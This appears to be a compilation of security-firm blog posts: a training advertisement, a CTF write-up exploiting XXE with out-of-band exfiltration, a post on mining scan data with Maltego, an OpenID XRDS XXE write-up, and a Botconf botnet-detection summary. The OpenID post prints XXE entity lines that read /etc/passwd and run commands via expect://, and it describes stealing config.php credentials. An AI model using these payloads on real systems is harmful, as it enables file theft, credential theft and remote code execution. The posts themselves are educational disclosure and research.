Web application security training in 2015?
Our response is yes. Our application assessment course constantly changes. We look at the thousands of assessments that we perform for our customers and take those vulnerabilities discovered, new architectures and designs and try and build practical exploitation scenarios for our students. We love breaking the web, the cloud, 'the box that's hosted somewhere you can't recall but just works', as there's always new approaches and methods one can take to own the application layer.
Last month I discovered a vulnerability in Redhat's OpenStack Platform. What was cool about this vulnerability is that it's not a new class of vulnerability but when deployed in an organisation, it allows an authenticated user the ability to read files on the filesystem with the permissions of the web server. Owning organisations is all about exploiting flaws and chaining them together to achieve the end goal.
We want to teach you the same process: from learning how to own the application layer whilst having fun doing it at BlackHat Asia - Singapore.
During the course we will have a view on:
Come and join us! It will be fun :)
We recently ran our Black Hat challenge where the ultimate prize was a seat on one of our training courses at Black Hat this year. This would allow the winner to attend any one of the following:
Simply trying out this feature and viewing how it functions. Viewing the feed tester result, we noticed that the contents of the XML formatted RSS feed were echoed and it became clear that this may be vulnerable to XXE. The first step would be to try a simple XML payload such as:
It looks like we have some more XML being submitted.. Again we tried XXE and found that using "file://" in our payload created an error. There were ways around this, however the returned data would be truncated and we would not be able to see the full contents of flag2.txt... When stuck with XXE and not being able to see the result (or complete result) there is always the chance that we can get the data out via the network. To do this we needed to generate a payload that would allow us to fetch an external DTD and then "submit" the contents of our target file to a server under our control. Our payload on our server looked like this:
As soon as the XML decoder parsed our malicious payload, we would receive the base64 encoded contents on our server:
Now it was a simple matter of decoding the payload and we had the second flag. This was not the only way to get flag 2! It was the most "fun" way of doing it though and used a really handy method. Remember it for your next pentest...
The two runners up who both can claim one of our awesome 2014 t-shirts:
Vitaly aka @send9
Sash aka @secdefect
This blog post is about the process we went through trying to better interpret the masses of scan results that automated vulnerability scanners and centralised logging systems produce. A good example of the value in getting actionable items out of this data is the recent Target compromise. Their scanning solutions detected the threat that lead to their compromise, but no humans intervened. It's suspected that too many security alerts were being generated on a regular basis to act upon.
The goal of our experiment was to steer away from the usual data interrogation questions of "What are the top N vulnerabilities my scanner has flagged with a high threat?" towards questions like "For how many of my vulnerabilities do public exploits exist?". Near the end of this exercise we stumbled across this BSides talk "Stop Fixing All The Things". Theses researchers took a similar view-point: "As security practitioners, we care about which vulnerabilities matter". Their blog post and video are definitely worth having a look at.
At SensePost we have a Managed Vulnerability Scanning service (MVS). It incorporates numerous scanning agents (e.g. Nessus, Nmap, Netsparker and a few others), and exposes an API to interact with the results. This was our starting point to explore threat related data. We could then couple this data with remote data sources (e.g. CVE data, exploit-db.com data).
We chose to use Maltego to explore the data as it's an incredibly powerful data exploration and visualisation tool, and writing transforms is straight forward. If you'd like to know more about Maltego here are some useful references:
It's also worth noting that for the demonstrations that follow we've obscured our clients' names by applying a salted 'human readable hash' to their names. A side effect is that you'll notice some rather humorous entries in the images and videos that follow.
Jumping into the interesting results, these are some of the tasks that we can perform:
In summary, building 'clever tools' that allow you to combine human insight can be powerful. An experiences analyst with the ability to ask the right questions, and building tools that allows answers to be easily extracted, yields actionable tasks in less time. We're going to start using this approach internally to find new ways to explore the vulnerability data sets of our scanning clients and see how it goes.
In the future, we're working on incorporating other data sources (e.g. LogRhythm, Skybox). We're also upgrading our MVS API - you'll notice a lot of the Maltego queries are cumbersome and slow due to its current linear exploration approach.
The source code for the API, the somewhat PoC Maltego transforms, and the MVS (BroadView) API can be downloaded from our GitHub page, and the MVS API from here. You'll need a paid subscription to incorporate the exploit-db.com data, but it's an initiative definitely worth supporting with a very fair pricing model. They do put significant effort in correlating CVEs. See this page for more information.
Do get in touch with us (or comment below) if you'd like to know more about the technical details, chat about the API (or expand on it), if this is a solution you'd like to deploy, or if you'd just like to say "Hi".
Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags:
Whereas the Yadis discovery relies on a XRDS document:
Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'.
From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using http://www.xmlvalidation.com/index.php)
In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC.
It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly.
The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.
Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.
This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution.
And Boom goes the dynamite.
All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:
A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
Botconf'13, the "First botnet fighting conference" took place in Nantes, France from 5-6 December 2013. Botconf aimed to bring together the anti-botnet community, including law enforcement, ISPs and researchers. To this end the conference was a huge success, especially since a lot of networking occurred over the lunch and tea breaks as well as the numerous social events organised by Botconf.
I was fortunate enough to attend as a speaker and to present a small part of my Masters research. The talk focused the use of Spatial Statistics to detect Fast-Flux botnet Command and Control (C2) domains based on the geographic location of the C2 servers. This research aimed to find novel techniques that would allow for accurate and lightweight classifiers to detect Fast-Flux domains. Using DNS query responses it was possible to identify Fast-Flux domains based on values such as the TTL, number of A records and different ASNs. In an attempt to increase the accuracy of this classifier, additional analysis was performed and it was observed that Fast-Flux domains tended to have numerous C2 servers widely dispersed geographically. Through the use of the statistical methods employed in plant and animal dispersion statistics, namely Moran's I and Geary's C, new classifiers were created. It was shown that these classifiers could detect Fast-Flux domains with up to a 97% accuracy, maintaining a False Positive rate of only 3.25% and a True Positive rate of 99%. Furthermore, it was shown that the use of these classifiers would not significantly impact current network performance and would not require changes to current network architecture.
The scripts used to conduct the research are available on github and are in the process of being updated (being made human readable): https://github.com/staaldraad/fastfluxanalysis
The following blogs provide a comprehensive round-up of the conference including summaries of the talks: